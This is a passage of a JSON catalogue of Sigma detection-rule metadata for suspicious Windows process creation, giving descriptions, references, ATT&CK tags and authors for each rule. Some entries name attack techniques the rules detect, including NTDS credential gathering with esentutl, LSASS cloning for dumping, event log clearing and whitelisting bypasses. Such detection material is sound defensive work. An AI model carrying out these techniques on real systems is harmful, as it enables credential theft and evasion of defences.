"proc_creation_win_susp_dllhost_no_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute C# code located in the consoleapp folder", - "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "value": "Application Whitelisting Bypass via Dnx.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - 
"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_dnx.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of dnx.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "value": "Suspicious Double Extension", - "meta": { - "refs": [ - "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", - "https://twitter.com/blackorbird/status/1140519090961825792", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2019/06/26", - "filename": "proc_creation_win_susp_double_extension.yml", - "author": "Florian Roth (rule), @blu3_team (idea)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "value": "Suspicious Download from Office Domain", - "meta": { - "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", - "https://twitter.com/mrd0x/status/1475085452784844803?s=12", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/27", - "filename": "proc_creation_win_susp_download_office_domain.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "value": "Suspicious Kernel Dump Using Dtrace", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/28", - "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "value": "Suspicious Electron Application Child Processes", - "meta": { - "refs": [ - "https://taggart-tech.com/quasar-electron/", - "https://github.com/mttaggart/quasar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" - ], - "tags": [ - 
"attack.execution" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_win_susp_electron_app_children.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "value": "Emotet RunDLL32 Process Creation", - "meta": { - "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/12/25", - "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", - "author": "FPT.EagleEye", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", - "value": "Esentutl Gather Credentials", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816", - "https://attack.mitre.org/software/S0404/", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" - ], - "creation_date": "2021/08/06", - "filename": "proc_creation_win_susp_esentutl_params.yml", - "author": "sam0x90", - "level": "medium", - "falsepositive": [ - "To be determined" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2019/09/26", - "filename": "proc_creation_win_susp_eventlog_clear.yml", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious execution from an uncommon folder", - "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "value": "Execution from Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_execution_path.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", - "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", - "value": "Execution in Webserver Root Folder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_execution_path_webserver.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Various applications", - "Tools that include ping or nslookup command invocations" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use 
explorer.exe for evading defense mechanisms", - "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "value": "Proxy Execution Via Explorer.exe", - "meta": { - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_susp_explorer.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "level": "low", - "falsepositive": [ - "Legitimate explorer.exe run from cmd.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "value": "Explorer Process Tree Break", - "meta": { - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/nas_bench/status/1535322450858233858", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/06/29", - "filename": "proc_creation_win_susp_explorer_break_proctree.yml", - "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown how many legitimate software products use that method" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": 
"Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "value": "Explorer NOUACCHECK Flag", - "meta": { - "refs": [ - "https://twitter.com/ORCA6665/status/1496478087244095491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "value": "Suspicious File Characteristics Due to Missing Fields", - "meta": { - "refs": [ - "https://securelist.com/muddywater/88059/", - "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.006" - ], - "creation_date": "2018/11/22", - "filename": "proc_creation_win_susp_file_characteristics.yml", - "author": "Markus Neis, Sander Wiebing", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", - "value": 
"GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", - "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", - "value": "Suspicious Findstr 385201 Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2021/12/16", - "filename": "proc_creation_win_susp_findstr_385201.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", - "value": "Findstr Launching .lnk File", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" - ], - "creation_date": "2020/05/01", - "filename": "proc_creation_win_susp_findstr_lnk.yml", - "author": "Trent Liffick", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", - "value": "Finger.exe Suspicious Invocation", - "meta": { - "refs": [ - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/02/24", - "filename": "proc_creation_win_susp_finger_usage.yml", - "author": "Florian Roth, omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity (unclear what they do nowadays with finger.exe)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "value": "Format.com FileSystem LOLBIN", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1477925112561209344", - "https://twitter.com/wdormann/status/1478011052130459653?s=20", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_susp_format.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "uuid": "add64136-62e5-48ea-807e-88638d02df1e", - "value": "Fsutil Suspicious Invocation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2019/09/26", - "filename": "proc_creation_win_susp_fsutil_usage.yml", - "author": "Ecco, E.M. 
Anhaus, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", - "value": "Gpresult Display Group Policy Information", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", - "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ], - "creation_date": "2022/05/01", - "filename": "proc_creation_win_susp_gpresult.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a scheduled task with a GUID like name", - "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "value": "Suspicious Scheduled Task Name As GUID", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/10/31", - 
"filename": "proc_creation_win_susp_guid_task_name.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate software naming their tasks as GUIDs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", - "value": "Suspicious GUP Usage", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2019/02/06", - "filename": "proc_creation_win_susp_gup.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", - "value": "Download Files Using Notepad++ GUP Utility", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535322182863179776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/06/10", - "filename": "proc_creation_win_susp_gup_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "value": "Execute Arbitrary Binaries Using GUP Utility", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535322445439180803", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/06/10", - "filename": "proc_creation_win_susp_gup_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Other parent binaries using GUP not currently identified" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of hostname to get information", - "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "value": "Suspicious Execution of Hostname", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_hostname.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "value": "Suspicious IIS Module Registration", - "meta": { - "refs": [ - 
"https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/04", - "filename": "proc_creation_win_susp_iis_module_registration.yml", - "author": "Florian Roth (rule), Microsoft (idea)", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", - "value": "Execution Of Non-Existing File", - "meta": { - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/12/09", - "filename": "proc_creation_win_susp_image_missing.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", - "value": "Suspicious Execution of InstallUtil Without Log", - "meta": { - "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - 
"creation_date": "2022/01/23", - "filename": "proc_creation_win_susp_instalutil.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", - "value": "Suspicious Invoke-WebRequest Usage", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious IIS native-code module installations via command line", - "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "value": "IIS Native-Code Module Command Line Installation", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/12/11", - "filename": "proc_creation_win_susp_iss_module_install.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown as 
it may vary from organisation to organisation how admins use to install IIS modules" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", - "value": "Suspicious Execution of Shutdown to Log Out", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_susp_logoff.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file.", - "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "value": "Wscript Execution from Non C Drive", - "meta": { - "refs": [ - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", - "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", - "author": "Aaron Herman", - "level": "medium", - "falsepositive": [ - "Legitimate applications installed on other partitions such as \"D:\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", - "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "value": "Suspicious LSASS Process Clone", - "meta": { - "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" - ], - "creation_date": "2021/11/27", - "filename": "proc_creation_win_susp_lsass_clone.yml", - "author": "Florian Roth, Samir Bousseaden", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of reg to get MachineGuid information", - "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", - "value": "Suspicious Query of MachineGUID", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_machineguid.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "value": "Suspicious Microsoft OneNote Child Process", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - 